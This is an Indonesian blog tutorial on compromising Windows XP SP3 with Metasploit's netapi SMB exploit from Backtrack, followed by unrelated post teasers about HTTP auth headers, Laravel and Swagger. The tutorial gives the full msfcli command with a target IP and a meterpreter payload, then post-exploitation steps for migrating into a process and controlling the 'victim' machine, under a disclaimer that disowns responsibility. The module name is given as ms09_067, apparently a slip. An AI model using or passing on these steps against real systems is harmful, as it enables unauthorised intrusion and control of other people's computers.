Skip to main content

Exploit Windows XP with Exploit Netapi

hello!!!


sekarang saya mau kasih tutorial bagaimana untuk Exploit Windows XP SP3 dengan Backtrack 5 R3. untuk melakukan exploit, kita akan menggunakan tools penetration testing yang sudah terinstall default di Backtrack 5 R3 yaitu Metasploit Framework(MSF). dalam kerjanya MSF menggunakan module exploit yang sudah tersimpan dalam toolsnya. MSF mempunyai module Exploit yang sangat banyak, dalam kali saya akan menggunakan salah satu modulenya yaitu "windows/smb/ms09_067_netapi" yang sudah terkenal.  :a

tanpa banyak kata lagi. langsung saja ke langkah-langkahnya. :

1. buka terminal.
2. ketik msfcli windows/smb/ms09_067_netapi RHOST=192.168.88.93 PAYLOAD=windows/meterpreter/bind_tcp E
( saya asumsikan Kalian sudah mengetahui IP VIctim nya)
3. tunggu beberapa detik, jika berhasil akan muncul "meterpreter>".
(syarat untuk exploit berhasil adalah firewall dalam victim harus terbuka/nonaktif).
4. setelah masuk meterpreter. kalian terserah mau ngapain. karna komputer korban sudah kalian kendalikan. ^..^
5. untuk lebih leluasa kalian harus mendapatkan user privelage target. dengan cara "migrate" kedalam salah satu process yang ada.
6. caranya ketik "ps".
7. ketik "migrate 644 " angka 644 bisa anda ganti dengan angka yang terdapat pada PID salah satu processnya.
dalam tutorial ini saya sengaja tidak memberikan shortcut karna saya sudah menyiapakan video untuk pembelajaran anda dibawah ini :


Video Tutorial Exploit Netapi

sekian tutorial saya. apabila ada yang tidak jelas bisa kalian tanyakan lewat kolom komentar.

DB : TUTORIAL INI DIPERUNTUKAN HANYA UNTUK PENGETAHUAN SEMATA. SEGALA TINDAKAN DARI USER YANG MENGGUNAKAN TUTORIAL INI. TIDAK DALAM TANGGUNG JAWAB PENULIS(SAYA).

semoga bermanfaat dan sampai jumpa....  :b   :c :d :f :g
:h :i

Popular posts from this blog

The Advantage of Using HTTP Default Authorization Scheme #DigitalSecurity

pixabay.com Hello Everyone, This day I would like to introduce you to the default header for authorization in HTTP. HTTP auth scheme is a guide or standardization scheme for the authorization header in the HTTP protocol. this standard is using key Authorization in the header and followed by a value that usually filled by key or token. for example : Authorization : <type> <key/token> this standard is the solution of the key header for authorization that really random was provided by developers to build an authorization header for their application, in my experience, developers used to "token" for their key in the header that usually followed by the hash value. the random key makes developers using more time for writing code for getting header key and validating the value which is you could use the library and focus on writing the logic of your application. Depend on Mozilla site , HTTP auth scheme divided by 4 types, such as : Basic  (see  RF

Laravel Tips : Membuat Model, Migration dan Controller dengan Sekali Jalan

  php artisan adalah generator laravel yang berfungsi untuk membuat file kodingan dengan mudah, seperti membuat controller, model, seeder, migration dan masih banyak lagi. artisan hanya bisa di lakukan di dalam lingkungan console, seperti cmd dan terminal. berikut akan saya tunjukan cara membuat controller, model, migration menggunakan php artisan. # membuat controller ketikkan perintah di bawah ini php artisan make:controller BlogController # membuat model ketikkan perintah di bawah ini php artisan make:model Blog # membuat migration ketikkan perintah di bawah ini php artisan make:migration blog # membuat seeder ketikkan perintah di bawah ini php artisan make:seeder BlogSeeder # membuat migration, controller, dan model sekaligus ketikkan perintah di bawah ini php artisan make:model -crm Blog perintah di atas akan mengenerate controller dengan nama BlogController dengan keadaan Resource method tertulis, model

Automatic API Documentation Swagger in Golang #GolangDev

pixabay.com In this article, I'll explain how to generate an API blueprint instantly using SwagGo in Golang. API blueprint is a document that contains a bunch of API endpoints, its slickly same as documentation but less description, it's allow another programmer to read and see all the available endpoint and try it out with sandbox feature. Swagger is one of the most used API blueprints right now, it's available in free but limited usage. if you wanna use the free credit, you need to understand YAML notation, you can read the example notation in swagger official documentation. but again, it's really hard and takes an expensive time to arranges all the notation to achieve a good API blueprint. fortunately, there are tools in Golang that allow us to generate the YAML notation and automatically generate the blueprint page with only using markup notation, and it's FREE unlimited for self-host, insane right? SwagGo tools are available here , the documentation is very cl